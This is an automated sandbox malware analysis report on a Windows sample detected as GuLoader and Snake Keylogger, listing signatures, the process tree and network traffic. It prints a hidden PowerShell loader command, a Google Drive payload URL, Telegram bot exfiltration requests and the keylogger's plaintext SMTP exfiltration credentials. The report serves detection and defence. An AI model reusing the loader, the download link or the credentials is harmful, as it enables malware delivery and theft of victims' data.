Edit tour

Windows Analysis Report
Adeleidae.exe

Overview

General Information

Sample name:	Adeleidae.exe
Analysis ID:	1540728
MD5:	9f3c578444b7f35f3d25eadd5695c162
SHA1:	4e06953078fc5119a5d0a13b8b62dd58bf81eac3
SHA256:	d783f362c426661574a149a0bd801223273fe02c26b3d154de21fdb9516caf86
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Adeleidae.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\Adeleidae.exe" MD5: 9F3C578444B7F35F3D25EADD5695C162)

powershell.exe (PID: 7424 cmdline: "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 8056 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.3023161132.0000000025878000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2435373853.0000000009251000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 8056	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8056, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49877

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 213.165.67.102, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8056, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50022

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)", CommandLine: "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Adeleidae.exe", ParentImage: C:\Users\user\Desktop\Adeleidae.exe, ParentProcessId: 7348, ParentProcessName: Adeleidae.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Labilise=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add';$Freilevs=$Labilise.SubString(6338,3);.$Freilevs($Labilise)", ProcessId: 7424, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T03:40:54.058663+0200	2803305	3	Unknown Traffic	192.168.2.4	49939	188.114.96.3	443	TCP
2024-10-24T03:40:57.881354+0200	2803305	3	Unknown Traffic	192.168.2.4	49967	188.114.96.3	443	TCP
2024-10-24T03:41:03.181876+0200	2803305	3	Unknown Traffic	192.168.2.4	50001	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T03:40:51.748153+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49918	132.226.8.169	80	TCP
2024-10-24T03:40:53.435617+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49918	132.226.8.169	80	TCP
2024-10-24T03:40:55.466840+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49945	132.226.8.169	80	TCP
2024-10-24T03:40:57.154416+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49961	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T03:40:43.308716+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	49877	142.250.185.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Adeleidae.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

Avira: detection malicious, Label: HEUR/AGEN.1333748

Found malware configuration

Source: 00000006.00000002.3023161132.0000000025771000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: Adeleidae.exe	ReversingLabs: Detection: 13%
Source: Adeleidae.exe	Virustotal: Detection: 22%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF87A8 CryptUnprotectData,		6_2_27EF87A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_27EF8EF1 CryptUnprotectData,		6_2_27EF8EF1

Source: Adeleidae.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49933 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50021 version: TLS 1.2

Source: Adeleidae.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tem.Core.pdbt source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \System.Core.pdbfu source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2434845770.0000000008851000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\Adeleidae.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02A8FC19h	6_2_02A8F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02A8F45Dh	6_2_02A8F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 02A8F45Dh	6_2_02A8F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF9280h	6_2_27EF8FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF7EB5h	6_2_27EF7B78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFD5D6h	6_2_27EFD308
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFBA76h	6_2_27EFB7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFFA56h	6_2_27EFF788
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF5A29h	6_2_27EF5780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFDA66h	6_2_27EFD798
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF2A01h	6_2_27EF2758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF79C9h	6_2_27EF7720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF5179h	6_2_27EF4ED0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF2151h	6_2_27EF1EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFF136h	6_2_27EFEE68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFD146h	6_2_27EFCE78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF7119h	6_2_27EF6E70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF48C9h	6_2_27EF4620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF18A1h	6_2_27EF15F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF0FF1h	6_2_27EF0D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFE816h	6_2_27EFE548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFC826h	6_2_27EFC558
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF6733h	6_2_27EF6488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF0741h	6_2_27EF0498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF3709h	6_2_27EF3460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFDEF6h	6_2_27EFDC28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFBF06h	6_2_27EFBC38
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF5E81h	6_2_27EF5BD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF2E59h	6_2_27EF2BB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF55D1h	6_2_27EF5328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF25A9h	6_2_27EF2300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFB5E6h	6_2_27EFB318
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFF5C6h	6_2_27EFF2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF7571h	6_2_27EF72C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF4D21h	6_2_27EF4A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF1CF9h	6_2_27EF1A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF6CC1h	6_2_27EF6A18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFCCB6h	6_2_27EFC9E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov esp, ebp	6_2_27EFB1C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFECA6h	6_2_27EFE9D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF1449h	6_2_27EF11A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF0B99h	6_2_27EF08F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFC396h	6_2_27EFC0C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EFE386h	6_2_27EFE0B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov esp, ebp	6_2_27EFB081
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF02E9h	6_2_27EF0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF62D9h	6_2_27EF6030
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27EF32B1h	6_2_27EF3008

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:50022 -> 213.165.67.102:587

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 213.165.67.102 213.165.67.102

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49945 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49961 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49918 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49939 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50001 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49877 -> 142.250.185.78:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49967 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.4:50022 -> 213.165.67.102:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49933 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.71 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216041%0D%0ADate%20and%20Time:%2024/10/2024%20/%2018:06:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216041%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: msiexec.exe, 00000006.00000003.2536801654.0000000009EF1000.00000004.00000020.00020000.00000000.sdmp

